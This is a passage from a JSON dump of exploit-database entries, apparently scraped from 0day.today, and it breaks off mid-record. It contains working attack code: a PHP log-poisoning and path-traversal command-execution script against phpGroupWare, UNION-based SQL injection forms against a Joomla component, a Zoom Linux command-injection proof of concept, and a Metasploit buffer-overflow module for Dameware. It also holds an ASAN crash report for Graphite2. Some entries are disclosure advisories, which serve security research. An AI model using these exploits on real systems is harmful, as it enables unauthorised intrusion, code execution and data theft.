$proxy=str_replace(\"-P\",\"\",$argv[$i]);\r\n}\r\n}\r\n$cmd=urlencode($cmd);\r\nif (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}\r\nif ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}\r\n\r\n$paths=array(\r\n\"../../../../../../../../../../../../var/log/httpd/access_log\",\r\n\"../../../../../../../../../../../../var/log/httpd/error_log\",\r\n\"../../../apache/logs/error.log\",\r\n\"../../../apache/logs/access.log\",\r\n\"../../../../apache/logs/error.log\",\r\n\"../../../../apache/logs/access.log\",\r\n\"../../../../../apache/logs/error.log\",\r\n\"../../../../../apache/logs/access.log\",\r\n\"../../../../../../apache/logs/error.log\",\r\n\"../../../../../../apache/logs/access.log\",\r\n\"../../../../../../../apache/logs/error.log\",\r\n\"../../../../../../../apache/logs/access.log\",\r\n\"../../../../../../../../apache/logs/error.log\",\r\n\"../../../../../../../../apache/logs/access.log\",\r\n\"../../../logs/error.log\",\r\n\"../../../logs/access.log\",\r\n\"../../../../logs/error.log\",\r\n\"../../../../logs/access.log\",\r\n\"../../../../../logs/error.log\",\r\n\"../../../../../logs/access.log\",\r\n\"../../../../../../logs/error.log\",\r\n\"../../../../../../logs/access.log\",\r\n\"../../../../../../../logs/error.log\",\r\n\"../../../../../../../logs/access.log\",\r\n\"../../../../../../../../logs/error.log\",\r\n\"../../../../../../../../logs/access.log\",\r\n\"../../../../../../../../../../../../etc/httpd/logs/acces_log\",\r\n\"../../../../../../../../../../../../etc/httpd/logs/acces.log\",\r\n\"../../../../../../../../../../../../etc/httpd/logs/error_log\",\r\n\"../../../../../../../../../../../../etc/httpd/logs/error.log\",\r\n\"../../../../../../../../../../../../var/www/logs/access_log\",\r\n\"../../../../../../../../../../../../var/www/logs/access.log\",\r\n\"../../../../../../../../../../../../usr/local/apache/logs/access_log\",\r\n\"../../../../../../../../../../../../usr/local/apache/logs/access.log\",\r\n\"../../../../../../../../../../../../var/log/apache/access_log\",\r\n\"../../../../../../../../../../../../var/log/apache/access.log\",\r\n\"../../../../../../../../../../../../var/log/access_log\",\r\n\"../../../../../../../../../../../../var/www/logs/error_log\",\r\n\"../../../../../../../../../../../../var/www/logs/error.log\",\r\n\"../../../../../../../../../../../../usr/local/apache/logs/error_log\",\r\n\"../../../../../../../../../../../../usr/local/apache/logs/error.log\",\r\n\"../../../../../../../../../../../../var/log/apache/error_log\",\r\n\"../../../../../../../../../../../../var/log/apache/error.log\",\r\n\"../../../../../../../../../../../../var/log/access_log\",\r\n\"../../../../../../../../../../../../var/log/error_log\"\r\n);\r\nfor ($i=0; $i<=count($paths)-1; $i++)\r\n{\r\n$a=$i+2;\r\necho \"[\".$a.\"] PATH: \".$paths[$i].\"\\r\\n\";\r\n$packet =\"GET \".$p.\"calendar/inc/class.holidaycalc.inc.php?GLOBALS[phpgw_info][user][preferences][common][country]=\".$paths[$i].\"%00&cmd=\".$cmd.\" HTTP/1.0\\r\\n\";\r\n$packet.=\"User-Agent: Googlebot/2.1\\r\\n\";\r\n$packet.=\"Host: \".$host.\"\\r\\n\";\r\n$packet.=\"Connection: Close\\r\\n\\r\\n\";\r\nsendpacketii($packet);\r\nif (strstr($html,\"56789\"))\r\n{\r\n $temp=explode(\"56789\",$html);\r\n echo $temp[1];\r\n echo \"\\r\\nExploit succeeded...\\r\\n\";\r\n die;\r\n}\r\n}\r\n?>\r\n\r\n\r\n\r\n\n# 0day.today [2018-04-10] #", "published": "2006-08-29T00:00:00", "references": [], "reporter": "Kacper", "modified": "2006-08-29T00:00:00", "href": "https://0day.today/exploit/description/756"}

{"result": {"zdt": [{"lastseen": "2018-04-14T01:47:40", "references": [], "description": "Exploit for php platform in category web applications", "edition": 1, "reporter": "Ihsan Sencan", "published": "2018-02-05T00:00:00", "title": "Joomla Zh BaiduMap 3.0.0.1 Component - SQL Injection Vulnerability", "type": "zdt", "enchantments": {"score": {"modified": "2018-04-14T01:47:40", "vector": "AV:N/AC:M/Au:M/C:N/I:N/A:P/", "value": 2.8}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2018-6605"], "modified": "2018-02-05T00:00:00", "id": "1337DAY-ID-29713", "href": "https://0day.today/exploit/description/29713", "sourceData": "\r\n<html>\r\n<body>\r\n\r\n \r\n\r\n\r\n<form action=\"http://localhost/[PATH]/index.php?option=com_zhbaidumap&no_html=1&format=raw&task=getPlacemarkDetails\" method=\"post\">\r\n<input name=\"id\" value=\"-11 UNION ALL SELECT 11,11,11,11,11,11,11,11,/*!01111CONCAT*/((/*!01111SELECT*/(@x)/*!01111FROM*/(/*!01111SELECT*/(@x:=0x00),(@NR:=0),(/*!01111SELECT*/(0)/*!01111FROM*/(INFORMATION_SCHEMA.TABLES)/*!01111WHERE*/(TABLE_SCHEMA!=0x696e116f726d6174696f6e5f736368656d61)/*!01111AND*/(0x00)IN(@x:=/*!01111CONCAT*/(@x,/*!01111LPAD*/(@NR:[email\u00a0protected]%1,4,0x30),0x3a20,table_name,0x3c62723e))))x)),11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11--\" type=\"hidden\">\r\n<input type=\"submit\" value=\"1-Ver Ayari\">\r\n</form>\r\n \r\n\r\n\r\n<form action=\"http://localhost/Joomla375/index.php?option=com_zhbaidumap&no_html=1&format=raw&task=getPlacemarkHoverText\" method=\"post\">\r\n<input name=\"id\" value=\"-22 UNION ALL SELECT 22,22,22,22,22,22,22,22,/*!02222CONCAT*/((/*!02222SELECT*/(@x)/*!02222FROM*/(/*!02222SELECT*/(@x:=0x00),(@NR:=0),(/*!02222SELECT*/(0)/*!02222FROM*/(INFORMATION_SCHEMA.TABLES)/*!02222WHERE*/(TABLE_SCHEMA!=0x696e226f726d6174696f6e5f736368656d61)/*!02222AND*/(0x00)IN(@x:=/*!02222CONCAT*/(@x,/*!02222LPAD*/(@NR:[email\u00a0protected]%1,4,0x30),0x3a20,table_name,0x3c62723e))))x)),22,22--\" type=\"hidden\">\r\n<input type=\"submit\" value=\"2-Ver Ayari\">\r\n</form>\r\n \r\n\r\n\r\n<form action=\"http://localhost/[PATH]/index.php?option=com_zhbaidumap&no_html=1&format=raw&task=getPathHoverText\" method=\"post\">\r\n<input name=\"id\" value=\"-33 UNION ALL SELECT 33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,/*!03333CONCAT*/((/*!03333SELECT*/(@x)/*!03333FROM*/(/*!03333SELECT*/(@x:=0x00),(@NR:=0),(/*!03333SELECT*/(0)/*!03333FROM*/(INFORMATION_SCHEMA.TABLES)/*!03333WHERE*/(TABLE_SCHEMA!=0x696e116f726d6174696f6e5f736368656d61)/*!03333AND*/(0x00)IN(@x:=/*!03333CONCAT*/(@x,/*!03333LPAD*/(@NR:[email\u00a0protected]%1,4,0x30),0x3a20,table_name,0x3c62723e))))x)),33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33--\" type=\"hidden\">\r\n<input type=\"submit\" value=\"3-Ver Ayari\">\r\n</form>\r\n \r\n\r\n\r\n<form action=\"http://localhost/[PATH]/index.php?option=com_zhbaidumap&no_html=1&format=raw&task=getPathDetails\" method=\"post\">\r\n<input name=\"id\" value=\"-44 UNION ALL SELECT 44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,/*!04444CONCAT*/((/*!04444SELECT*/(@x)/*!04444FROM*/(/*!04444SELECT*/(@x:=0x00),(@NR:=0),(/*!04444SELECT*/(0)/*!04444FROM*/(INFORMATION_SCHEMA.TABLES)/*!04444WHERE*/(TABLE_SCHEMA!=0x696e116f726d6174696f6e5f736368656d61)/*!04444AND*/(0x00)IN(@x:=/*!04444CONCAT*/(@x,/*!04444LPAD*/(@NR:[email\u00a0protected]%1,4,0x30),0x3a20,table_name,0x3c62723e))))x)),44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44,44--\" type=\"hidden\">\r\n<input type=\"submit\" value=\"4-Ver Ayari\">\r\n</form>\r\n \r\n</body>\r\n</html>\n\n# 0day.today [2018-04-14] #", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/29713"}, {"lastseen": "2018-04-03T01:36:52", "references": [], "description": "The binary /opt/zoom/ZoomLauncher is vulnerable to command injection because it uses user input to construct a shell command without proper sanitization. The client registers a scheme handler (zoommtg://) and this makes possible to trigger the vulnerability remotely. Version 2.0.106600.0904 is affected.", "edition": 1, "reporter": "Gabriel Quadros", "published": "2017-12-17T00:00:00", "title": "Zoom Linux Client 2.0.106600.0904 Command Injection Vulnerability", "type": "zdt", "enchantments": {"score": {"modified": "2018-04-03T01:36:52", "vector": "AV:N/AC:M/Au:M/C:N/I:N/A:P/", "value": 2.8}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2017-15049"], "modified": "2017-12-17T00:00:00", "id": "1337DAY-ID-29243", "href": "https://0day.today/exploit/description/29243", "sourceData": "Zoom Linux Client Command Injection Vulnerability (RCE)\r\n\r\n1. Advisory Information\r\n Conviso Advisory ID: CONVISO-17-003\r\n CVE ID: CVE-2017-15049\r\n CVSS v2: 10, (AV:N/AC:L/Au:N/C:C/I:C/A:C)\r\n Date: 2017-10-01\r\n\r\n2. Affected Components\r\n Zoom client for Linux, version 2.0.106600.0904 (zoom_amd64.deb).\r\nOther versions may be\r\n vulnerable.\r\n\r\n3. Description\r\n The binary /opt/zoom/ZoomLauncher is vulnerable to command\r\ninjection because it uses user input\r\n to construct a shell command without proper sanitization.\r\n The client registers a scheme handler (zoommtg://) and this makes\r\npossible to trigger the\r\n vulnerability remotely.\r\n\r\n4. Details\r\n gef> r '$(uname)'\r\n Starting program: /opt/zoom/ZoomLauncher '$(uname)'\r\n ZoomLauncher started.\r\n cmd line: $(uname)\r\n $HOME = /home/user\r\n\r\n Breakpoint 5, 0x0000000000401e1f in startZoom(char*, char*) ()\r\n gef> x/3i $pc\r\n => 0x401e1f <_Z9startZoomPcS_+744>: call 0x4010f0 <[email\u00a0protected]>\r\n 0x401e24 <_Z9startZoomPcS_+749>: lea rax,[rbp-0x1420]\r\n 0x401e2b <_Z9startZoomPcS_+756>: mov rcx,0xffffffffffffffff\r\n gef> x/s $rdi\r\n 0x7fffffffbf10: \"export SSB_HOME=/home/user/.zoom; export QSG_INFO=1; export\r\n LD_LIBRARY_PATH=/opt/zoom;/opt/zoom/zoom \\\"\"\r\n gef> x/s $rsi\r\n 0x7fffffffd750: \"$(uname) \"\r\n gef> c\r\n Continuing.\r\n export SSB_HOME=/home/user/.zoom; export QSG_INFO=1; export\r\n LD_LIBRARY_PATH=/opt/zoom;/opt/zoom/zoom \"$(uname) \"\r\n\r\n Breakpoint 6, 0x0000000000401e82 in startZoom(char*, char*) ()\r\n gef> x/3i $pc\r\n => 0x401e82 <_Z9startZoomPcS_+843>: call 0x401040 <[email\u00a0protected]>\r\n 0x401e87 <_Z9startZoomPcS_+848>: mov DWORD PTR [rbp-0x18],eax\r\n 0x401e8a <_Z9startZoomPcS_+851>: mov eax,DWORD PTR [rbp-0x18]\r\n gef> x/s $rdi\r\n 0x7fffffffbf10: \"export SSB_HOME=/home/user/.zoom; export QSG_INFO=1; export\r\n LD_LIBRARY_PATH=/opt/zoom;/opt/zoom/zoom \\\"$(uname) \\\"\"\r\n\r\n --- RCE POC ---\r\n <html>\r\n <head>\r\n </head>\r\n <body>\r\n <h1>Zoom POC RCE</h1>\r\n <script>\r\n window.location =\r\n'zoommtg://$(gnome-calculator${IFS}-e${IFS}1337)'\r\n </script>\r\n <body>\r\n </html>\r\n\r\n5. Solution\r\n Upgrade to latest version.\r\n\r\n6. Credits\r\n Ricardo Silva <[email\u00a0protected]>\r\n Gabriel Quadros <[email\u00a0protected]>\r\n\r\n7. Report Timeline\r\n Set 28, 2017 - Conviso sent first email asking for a channel to\r\ndiscuss the vulnerability.\r\n Set 28, 2017 - Vendor asked the report in the current channel.\r\n Set 28, 2017 - Conviso sent informations to reproduce the vulnerability.\r\n Set 28, 2017 - Conviso asked if they could reproduce it.\r\n Set 28, 2017 - Vendor replied saying that the informations were\r\nforwarded to engineering team.\r\n Oct 5, 2017 - Vendor provided a patch candidate for testing.\r\n Oct 5, 2017 - Conviso pointed problems in the patch.\r\n Oct 11, 2017 - Vendor provided a patch candidate for testing.\r\n Oct 12, 2017 - Conviso pointed problems in the patch.\r\n Oct 23, 2017 - Conviso asked for status.\r\n Oct 27, 2017 - Conviso asked for status.\r\n Nov 1, 2017 - Conviso asked for status.\r\n Nov 3, 2017 - Vendor replied.\r\n Nov 6, 2017 - Conviso asked for status.\r\n Nov 6, 2017 - Vendor replied.\r\n Nov 9, 2017 - Conviso asked for status.\r\n Nov 13, 2017 - Conviso asked for status.\r\n Nov 15, 2017 - Conviso asked for status.\r\n Nov 16, 2017 - Vendor provided a patch candidate for testing.\r\n Nov 16, 2017 - The patch seems to fix the attack vector, although\r\nno further research was done.\r\n Nov 20, 2017 - Vendor thanked and marked the issue as solved,\r\nconsidering the patch as a\r\n sastifactory fix.\r\n Nov 30, 2017 - Vendor released the version 2.0.115900.1201\r\n\r\n8. References\r\n https://zoom.us/download\r\n https://support.zoom.us/hc/en-us/articles/205759689-New-Updates-for-Linux\r\n\r\n9. About Conviso\r\n Conviso is a consulting company specialized on application\r\nsecurity. Our values are based on the\r\n allocation of the adequate competencies on the field, a clear and\r\ndirect speech with the market,\r\n collaboration and partnership with our customers and business\r\npartners and constant investments\r\n on methodology and research improvement. For more information\r\nabout our company and services\r\n provided, please check our website at www.conviso.com.br.\r\n\r\n10. Copyright and Disclaimer\r\n The information in this advisory is Copyright 2017 Conviso\r\nApplication Security S/A and provided\r\n so that the society can understand the risk they may be facing by\r\nrunning affected software,\r\n hardware or other components used on their systems. In case you\r\nwish to copy information from\r\n this advisory, you must either copy all of it or refer to this\r\ndocument (including our URL). No\r\n guarantee is provided for the accuracy of this information, or\r\ndamage you may cause your systems\r\n in testing.\n\n# 0day.today [2018-04-03] #", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/29243"}, {"lastseen": "2018-01-06T09:16:17", "references": [], "description": "Exploit for windows platform in category remote exploits", "edition": 1, "reporter": "James Fitts", "published": "2017-09-13T00:00:00", "title": "Dameware Mini Remote Control 4.0 - Username Stack Buffer Overflow Exploit", "type": "zdt", "enchantments": {"score": {"modified": "2018-01-06T09:16:17", "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:N/", "value": 5.5}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2005-2842"], "modified": "2017-09-13T00:00:00", "id": "1337DAY-ID-28540", "href": "https://0day.today/exploit/description/28540", "sourceData": "require 'msf/core'\r\n \r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = GreatRanking\r\n \r\n include Msf::Exploit::Remote::Tcp\r\n \r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Dameware Mini Remote Control Username Stack Buffer Overflow',\r\n 'Description' => %q{\r\n This module exploits a stack based buffer overflow vulnerability found\r\n in Dameware Mini Remote Control v4.0. The overflow is caused when sending\r\n an overly long username to the DWRCS executable listening on port 6129.\r\n The username is read into a strcpy() function causing an overwrite of\r\n the return pointer leading to arbitrary code execution.\r\n },\r\n 'Author' => [ 'James Fitts' ],\r\n 'License' => MSF_LICENSE,\r\n 'Version' => '$Revision: $',\r\n 'References' =>\r\n [\r\n [ 'CVE', '2005-2842' ],\r\n [ 'BID', '14707' ],\r\n [ 'URL', 'http://secunia.com/advisories/16655' ],\r\n [ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2005-08/1074.html' ]\r\n ],\r\n 'DefaultOptions' =>\r\n {\r\n 'EXITFUNC' => 'thread',\r\n },\r\n 'Privileged' => true,\r\n 'Payload' =>\r\n {\r\n 'Space' => 140,\r\n 'BadChars' => \"\\x00\\x0a\\x0d\",\r\n 'StackAdjustment' => -3500,\r\n 'PrependEncoder' => \"\\xeb\\x03\\x59\\xeb\\x05\\xe8\\xf8\\xff\\xff\\xff\",\r\n 'Compat' =>\r\n {\r\n 'SymbolLookup' => '+ws2ord',\r\n },\r\n },\r\n 'Platform' => 'win',\r\n 'Targets' =>\r\n [\r\n [ \r\n 'Windows XP SP3 EN', \r\n { \r\n # msvcrt.dll\r\n # push esp/ retn\r\n 'Ret' => 0x77c35459, \r\n } \r\n ],\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DisclosureDate' => 'Sept 01 2005'))\r\n \r\n register_options(\r\n [\r\n Opt::RPORT(6129),\r\n ], self.class )\r\n end\r\n \r\n def pkt1\r\n p = payload.encoded\r\n \r\n boom = \"\\x43\" * 259\r\n boom[100, 4] = [target.ret].pack('V')\r\n boom[108, p.length] = p\r\n \r\n packet = \"\\x00\" * 4056\r\n packet[0, 4] = \"\\x30\\x11\\x00\\x00\"\r\n packet[4, 4] = \"\\x00\\x00\\x00\\x00\"\r\n packet[8, 4] = \"\\xd7\\xa3\\x70\\x3d\"\r\n packet[12, 4] = \"\\x0a\\xd7\\x0d\\x40\"\r\n packet[16, 20] = \"\\x00\" * 20\r\n packet[36, 4] = \"\\x01\\x00\\x00\\x00\"\r\n \r\n packet[40, 4] = [0x00002710].pack('V')\r\n packet[196, 259] = rand_text_alpha(259)\r\n packet[456, 259] = boom\r\n packet[716, 259] = rand_text_alpha(259)\r\n packet[976, 259] = rand_text_alpha(259)\r\n packet[1236, 259] = rand_text_alpha(259)\r\n packet[1496, 259] = rand_text_alpha(259)\r\n \r\n return packet\r\n end\r\n \r\n def pkt2\r\n packet = \"\\x00\" * 4096\r\n packet[756, 259] = rand_text_alpha(259)\r\n \r\n return packet\r\n \r\n end\r\n \r\n def exploit\r\n connect\r\n \r\n sock.put(pkt1)\r\n sock.recv(1024)\r\n sock.put(pkt2)\r\n sock.recv(84)\r\n \r\n handler\r\n disconnect\r\n end\r\n \r\nend\r\n__END__\n\n# 0day.today [2018-01-06] #", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/28540"}, {"lastseen": "2018-02-15T21:25:07", "references": [], "description": "Exploit for multiple platform in category dos / poc", "edition": 1, "reporter": "Google Security Research", "published": "2016-05-26T00:00:00", "title": "Graphite2 - NameTable::getName Multiple Heap Based Out-of-Bounds Reads", "type": "zdt", "enchantments": {"score": {"modified": "2018-02-15T21:25:07", "vector": "AV:N/AC:M/Au:M/C:N/I:N/A:C/", "value": 5.7}}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2016-05-26T00:00:00", "id": "1337DAY-ID-26025", "href": "https://0day.today/exploit/description/26025", "sourceData": "Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=756\r\n \r\nWe have encountered several different crashes in the graphite2::NameTable::getName method, observed in an ASAN build of the standard Graphite2 gr2FontTest utility (git trunk), triggered with the following command:\r\n \r\n$ ./gr2fonttest -demand -cache /path/to/file\r\n \r\nBelow are three unique ASAN reports that we have triggered.\r\n \r\n--- cut ---\r\n==1191==ERROR: AddressSanitizer: SEGV on unknown address 0x61b000026b15 (pc 0x000000553c81 bp 0x7ffc0e24a820 sp 0x7ffc0e24a800 T0)\r\n #0 0x553c80 in unsigned long be::_peek<1>(unsigned char const*) graphite/src/./inc/Endian.h:77:73\r\n #1 0x553bd3 in unsigned long be::_peek<2>(unsigned char const*) graphite/src/./inc/Endian.h:50:16\r\n #2 0x5516cb in unsigned short be::read<unsigned short>(unsigned char const*&) graphite/src/./inc/Endian.h:60:23\r\n #3 0x59192b in graphite2::NameTable::getName(unsigned short&, unsigned short, gr_encform, unsigned int&) graphite/src/NameTable.cpp:157:24\r\n #4 0x572e5c in gr_fref_label graphite/src/gr_features.cpp:97:12\r\n #5 0x4eaec8 in Parameters::printFeatures(gr_face const*) const (graphite/gr2fonttest/gr2fonttest+0x4eaec8)\r\n #6 0x4ed32b in Parameters::testFileFont() const (graphite/gr2fonttest/gr2fonttest+0x4ed32b)\r\n #7 0x4f06c9 in main (graphite/gr2fonttest/gr2fonttest+0x4f06c9)\r\n \r\nAddressSanitizer can not provide additional info.\r\nSUMMARY: AddressSanitizer: SEGV graphite/src/./inc/Endian.h:77:73 in unsigned long be::_peek<1>(unsigned char const*)\r\n==1191==ABORTING\r\n--- cut ---\r\n \r\n--- cut ---\r\n==1199==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61b00001fb95 at pc 0x000000553c7d bp 0x7ffdebef2a70 sp 0x7ffdebef2a68\r\nREAD of size 1 at 0x61b00001fb95 thread T0\r\n #0 0x553c7c in unsigned long be::_peek<1>(unsigned char const*) graphite/src/./inc/Endian.h:77:73\r\n #1 0x553bd3 in unsigned long be::_peek<2>(unsigned char const*) graphite/src/./inc/Endian.h:50:16\r\n #2 0x5516cb in unsigned short be::read<unsigned short>(unsigned char const*&) graphite/src/./inc/Endian.h:60:23\r\n #3 0x59192b in graphite2::NameTable::getName(unsigned short&, unsigned short, gr_encform, unsigned int&) graphite/src/NameTable.cpp:157:24\r\n #4 0x572e5c in gr_fref_label graphite/src/gr_features.cpp:97:12\r\n #5 0x4eaec8 in Parameters::printFeatures(gr_face const*) const (graphite/gr2fonttest/gr2fonttest+0x4eaec8)\r\n #6 0x4ed32b in Parameters::testFileFont() const (graphite/gr2fonttest/gr2fonttest+0x4ed32b)\r\n #7 0x4f06c9 in main (graphite/gr2fonttest/gr2fonttest+0x4f06c9)\r\n \r\nAddressSanitizer can not describe address in more detail (wild memory access suspected).\r\nSUMMARY: AddressSanitizer: heap-buffer-overflow graphite/src/./inc/Endian.h:77:73 in unsigned long be::_peek<1>(unsigned char const*)\r\nShadow bytes around the buggy address:\r\n 0x0c367fffbf20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0c367fffbf30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0c367fffbf40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0c367fffbf50: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0c367fffbf60: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n=>0x0c367fffbf70: fa fa[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0c367fffbf80: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0c367fffbf90: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0c367fffbfa0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0c367fffbfb0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0c367fffbfc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\nShadow byte legend (one shadow byte represents 8 application bytes):\r\n Addressable: 00\r\n Partially addressable: 01 02 03 04 05 06 07 \r\n Heap left redzone: fa\r\n Heap right redzone: fb\r\n Freed heap region: fd\r\n Stack left redzone: f1\r\n Stack mid redzone: f2\r\n Stack right redzone: f3\r\n Stack partial redzone: f4\r\n Stack after return: f5\r\n Stack use after scope: f8\r\n Global redzone: f9\r\n Global init order: f6\r\n Poisoned by user: f7\r\n Container overflow: fc\r\n Array cookie: ac\r\n Intra object redzone: bb\r\n ASan internal: fe\r\n Left alloca redzone: ca\r\n Right alloca redzone: cb\r\n==1199==ABORTING\r\n--- cut ---\r\n \r\n--- cut ---\r\n==1315==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60400000db3a at pc 0x00000057d59d bp 0x7ffd01d33840 sp 0x7ffd01d33838\r\nREAD of size 2 at 0x60400000db3a thread T0\r\n #0 0x57d59c in graphite2::_utf_codec<16>::get(unsigned short const*, signed char&) graphite/src/./inc/UtfCodec.h:97:27\r\n #1 0x57d0a7 in graphite2::_utf_iterator<unsigned short const>::reference::operator unsigned int() const graphite/src/./inc/UtfCodec.h:173:74\r\n #2 0x591d32 in graphite2::NameTable::getName(unsigned short&, unsigned short, gr_encform, unsigned int&) graphite/src/NameTable.cpp:173:18\r\n #3 0x572e5c in gr_fref_label graphite/src/gr_features.cpp:97:12\r\n #4 0x4eaec8 in Parameters::printFeatures(gr_face const*) const (graphite/gr2fonttest/gr2fonttest+0x4eaec8)\r\n #5 0x4ed32b in Parameters::testFileFont() const (graphite/gr2fonttest/gr2fonttest+0x4ed32b)\r\n #6 0x4f06c9 in main (graphite/gr2fonttest/gr2fonttest+0x4f06c9)\r\n \r\n0x60400000db3a is located 0 bytes to the right of 42-byte region [0x60400000db10,0x60400000db3a)\r\nallocated by thread T0 here:\r\n #0 0x4b85b8 in malloc llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:40\r\n #1 0x55a24a in unsigned short* graphite2::gralloc<unsigned short>(unsigned long) graphite/src/./inc/Main.h:88:28\r\n #2 0x5916ef in graphite2::NameTable::getName(unsigned short&, unsigned short, gr_encform, unsigned int&) graphite/src/NameTable.cpp:147:37\r\n #3 0x572e5c in gr_fref_label graphite/src/gr_features.cpp:97:12\r\n #4 0x4eaec8 in Parameters::printFeatures(gr_face const*) const (graphite/gr2fonttest/gr2fonttest+0x4eaec8)\r\n #5 0x4ed32b in Parameters::testFileFont() const (graphite/gr2fonttest/gr2fonttest+0x4ed32b)\r\n #6 0x4f06c9 in main (graphite/gr2fonttest/gr2fonttest+0x4f06c9)\r\n \r\nSUMMARY: AddressSanitizer: heap-buffer-overflow graphite/src/./inc/UtfCodec.h:97:27 in graphite2::_utf_codec<16>::get(unsigned short const*, signed char&)\r\nShadow bytes around the buggy address:\r\n 0x0c087fff9b10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0c087fff9b20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0c087fff9b30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0c087fff9b40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0c087fff9b50: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n=>0x0c087fff9b60: fa fa 00 00 00 00 00[02]fa fa fd fd fd fd fd fd\r\n 0x0c087fff9b70: fa fa fd fd fd fd fd fa fa fa fd fd fd fd fd fd\r\n 0x0c087fff9b80: fa fa fd fd fd fd fd fd fa fa 00 00 00 00 00 00\r\n 0x0c087fff9b90: fa fa 00 00 00 00 00 fa fa fa fd fd fd fd fd fa\r\n 0x0c087fff9ba0: fa fa fd fd fd fd fd fd fa fa fd fd fd fd fd fa\r\n 0x0c087fff9bb0: fa fa fd fd fd fd fd fa fa fa fd fd fd fd fd fd\r\nShadow byte legend (one shadow byte represents 8 application bytes):\r\n Addressable: 00\r\n Partially addressable: 01 02 03 04 05 06 07 \r\n Heap left redzone: fa\r\n Heap right redzone: fb\r\n Freed heap region: fd\r\n Stack left redzone: f1\r\n Stack mid redzone: f2\r\n Stack right redzone: f3\r\n Stack partial redzone: f4\r\n Stack after return: f5\r\n Stack use after scope: f8\r\n Global redzone: f9\r\n Global init order: f6\r\n Poisoned by user: f7\r\n Container overflow: fc\r\n Array cookie: ac\r\n Intra object redzone: bb\r\n ASan internal: fe\r\n Left alloca redzone: ca\r\n Right alloca redzone: cb\r\n==1315==ABORTING\r\n--- cut ---\r\n \r\nThe bug was reported at https://bugzilla.mozilla.org/show_bug.cgi?id=1254497. Attached are three font files which reproduce the crashes.\r\n \r\n \r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39863.zip\n\n# 0day.today [2018-02-15] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/26025"}, {"lastseen": "2018-04-09T16:58:13", "references": [], "edition": 2, "description": "Exploit for windows platform in category remote exploits", "reporter": "metasploit", "published": "2013-07-22T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 9.3}}, "type": "zdt", "title": "Apple Quicktime 7 Invalid Atom Length Buffer Overflow", "bulletinFamily": "exploit", "cvelist": [], "modified": "2013-07-22T00:00:00", "id": "1337DAY-ID-21017", "href": "https://0day.today/exploit/description/21017", "sourceData": "require 'msf/core'\r\n \r\nclass Metasploit4 < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n \r\n include Msf::Exploit::Remote::HttpServer::HTML\r\n \r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => \"Apple Quicktime 7 Invalid Atom Length Buffer Overflow\",\r\n 'Description' => %q{\r\n This module exploits a vulnerability found in Apple Quicktime. The flaw is\r\n triggered when Quicktime fails to properly handle the data length for certain\r\n atoms such as 'rdrf' or 'dref' in the Alis record, which may result a buffer\r\n overflow by loading a specially crafted .mov file, and allows arbitrary\r\n code execution under the context of the user.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Jason Kratzer', # Original Discovery & PoC (overlapped finding), aka pyoor\r\n 'Tom Gallagher', # Original Discovery (overlapped)\r\n 'Paul Bates', # Original Discovery (overlapped)\r\n 'sinn3r' # Metasploit\r\n ],\r\n 'References' =>\r\n [\r\n [ 'CVE', '2013-1017' ],\r\n [ 'BID', '60097' ],\r\n [ 'URL', 'http://support.apple.com/kb/HT5770' ]\r\n ],\r\n 'Platform' => 'win',\r\n 'Targets' =>\r\n 